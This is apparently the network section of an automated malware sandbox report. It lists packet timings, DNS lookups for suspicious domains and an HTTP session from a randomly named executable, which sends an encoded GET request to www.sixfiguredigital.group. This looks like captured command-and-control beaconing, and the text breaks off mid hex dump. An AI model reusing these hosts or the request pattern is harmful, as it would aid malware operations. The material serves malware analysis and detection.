                                                                                                    Mar 10, 2025 11:59:03.335731030 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.335737944 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.335743904 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.335802078 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.335830927 CET4974180192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:03.335939884 CET4974180192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:03.340972900 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.340992928 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.341003895 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.341047049 CET4974180192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:03.341145992 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.341211081 CET4974180192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:03.431302071 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.431319952 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.431427956 CET8049741203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:03.431596994 CET4974180192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:04.291394949 CET4974180192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.313644886 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.321568966 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.321696043 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.330935001 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.337543011 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934113026 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934166908 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934201956 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934235096 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934243917 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.934267998 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934302092 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934331894 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934355021 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.934366941 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934401035 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934417963 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.934434891 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.934485912 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.939575911 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.939610004 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.939646006 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:05.939665079 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:05.994251013 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:06.026010036 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:06.026084900 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:06.026124001 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:06.026211977 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:06.028018951 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:06.029442072 CET4974280192.168.2.4203.161.42.73
                                                                                                    Mar 10, 2025 11:59:06.035602093 CET8049742203.161.42.73192.168.2.4
                                                                                                    Mar 10, 2025 11:59:11.697457075 CET4974380192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:11.702655077 CET8049743142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:11.702729940 CET4974380192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:11.719400883 CET4974380192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:11.724482059 CET8049743142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:12.316680908 CET8049743142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:12.316715956 CET8049743142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:12.316777945 CET4974380192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:13.228744984 CET4974380192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:14.248070955 CET4974480192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:14.253346920 CET8049744142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:14.256225109 CET4974480192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:14.272064924 CET4974480192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:14.277158022 CET8049744142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:14.864885092 CET8049744142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:14.865025997 CET8049744142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:14.870099068 CET4974480192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:15.775696039 CET4974480192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:16.793787003 CET4974580192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:16.799137115 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:16.802150011 CET4974580192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:16.818212032 CET4974580192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:16.823312044 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:16.823472023 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:16.823499918 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:16.823648930 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:16.823676109 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:16.823709965 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:17.418984890 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:17.419049025 CET8049745142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:17.419110060 CET4974580192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:18.869812012 CET4974580192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:19.887691021 CET4974680192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:19.893018961 CET8049746142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:19.893148899 CET4974680192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:19.900736094 CET4974680192.168.2.4142.0.133.149
                                                                                                    Mar 10, 2025 11:59:19.905843019 CET8049746142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:20.513004065 CET8049746142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:20.513178110 CET8049746142.0.133.149192.168.2.4
                                                                                                    Mar 10, 2025 11:59:20.513273954 CET4974680192.168.2.4142.0.133.149
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Mar 10, 2025 11:58:15.021013975 CET6386053192.168.2.41.1.1.1
                                                                                                    Mar 10, 2025 11:58:15.042248011 CET53638601.1.1.1192.168.2.4
                                                                                                    Mar 10, 2025 11:58:30.726315975 CET5266453192.168.2.41.1.1.1
                                                                                                    Mar 10, 2025 11:58:30.738173008 CET53526641.1.1.1192.168.2.4
                                                                                                    Mar 10, 2025 11:58:44.170845032 CET5442153192.168.2.41.1.1.1
                                                                                                    Mar 10, 2025 11:58:44.188472033 CET53544211.1.1.1192.168.2.4
                                                                                                    Mar 10, 2025 11:58:57.497524023 CET5767153192.168.2.41.1.1.1
                                                                                                    Mar 10, 2025 11:58:57.509638071 CET53576711.1.1.1192.168.2.4
                                                                                                    Mar 10, 2025 11:59:11.045558929 CET5342453192.168.2.41.1.1.1
                                                                                                    Mar 10, 2025 11:59:11.694174051 CET53534241.1.1.1192.168.2.4
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Mar 10, 2025 11:58:15.021013975 CET192.168.2.41.1.1.10x89c6Standard query (0)www.sixfiguredigital.groupA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:30.726315975 CET192.168.2.41.1.1.10xe8eaStandard query (0)www.playav.mobiA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:44.170845032 CET192.168.2.41.1.1.10xba80Standard query (0)www.eedpisalgenius.shopA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:57.497524023 CET192.168.2.41.1.1.10x9f44Standard query (0)www.thrivay.websiteA (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:59:11.045558929 CET192.168.2.41.1.1.10x4091Standard query (0)www.79456217.xyzA (IP address)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Mar 10, 2025 11:58:15.042248011 CET1.1.1.1192.168.2.40x89c6No error (0)www.sixfiguredigital.groupsixfiguredigital.groupCNAME (Canonical name)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:15.042248011 CET1.1.1.1192.168.2.40x89c6No error (0)sixfiguredigital.group77.95.113.182A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:30.738173008 CET1.1.1.1192.168.2.40xe8eaNo error (0)www.playav.mobi51.222.255.207A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:44.188472033 CET1.1.1.1192.168.2.40xba80No error (0)www.eedpisalgenius.shop104.21.18.45A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:44.188472033 CET1.1.1.1192.168.2.40xba80No error (0)www.eedpisalgenius.shop172.67.180.97A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:58:57.509638071 CET1.1.1.1192.168.2.40x9f44No error (0)www.thrivay.website203.161.42.73A (IP address)IN (0x0001)false
                                                                                                    Mar 10, 2025 11:59:11.694174051 CET1.1.1.1192.168.2.40x4091No error (0)www.79456217.xyz142.0.133.149A (IP address)IN (0x0001)false
                                                                                                    • www.sixfiguredigital.group
                                                                                                    • www.playav.mobi
                                                                                                    • www.eedpisalgenius.shop
                                                                                                    • www.thrivay.website
                                                                                                    • www.79456217.xyz
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.44972977.95.113.182806524C:\Program Files (x86)\skTmzWnqHCUyfoWiLLEjourpbIyTFtNZHLKACPUDeVzDGrkQTFGfGkYnPluvtZjEQmAIHN\9WAxm5F77VClmSoGxi.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Mar 10, 2025 11:58:15.064080000 CET429OUTGET /aoc3/?ch=ENVuXSwqVK4LLJ4bV1ZPNpNHllh6tIMu0UDTRKKNf697foRm0cYEZ1DAoMd0qHiAIGHFieBWVgv/TRDvXeOl/Y7+QOq+siVAyTU6uEP6mIDa1u4fFD7FLl8=&_tlHk=JrClDd5H HTTP/1.1
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                    Accept-Language: en-us
                                                                                                    Host: www.sixfiguredigital.group
                                                                                                    Connection: close
                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:35.0) Gecko/20100101 Firefox/35.0
                                                                                                    Mar 10, 2025 11:58:15.673815966 CET1236INHTTP/1.1 404 Not Found
                                                                                                    Connection: close
                                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                    pragma: no-cache
                                                                                                    content-type: text/html
                                                                                                    content-length: 1238
                                                                                                    date: Mon, 10 Mar 2025 10:58:15 GMT
                                                                                                    server: LiteSpeed
                                                                                                    vary: User-Agent
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a st
                                                                                                    Mar 10, 2025 11:58:15.673841953 CET258INData Raw: 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 7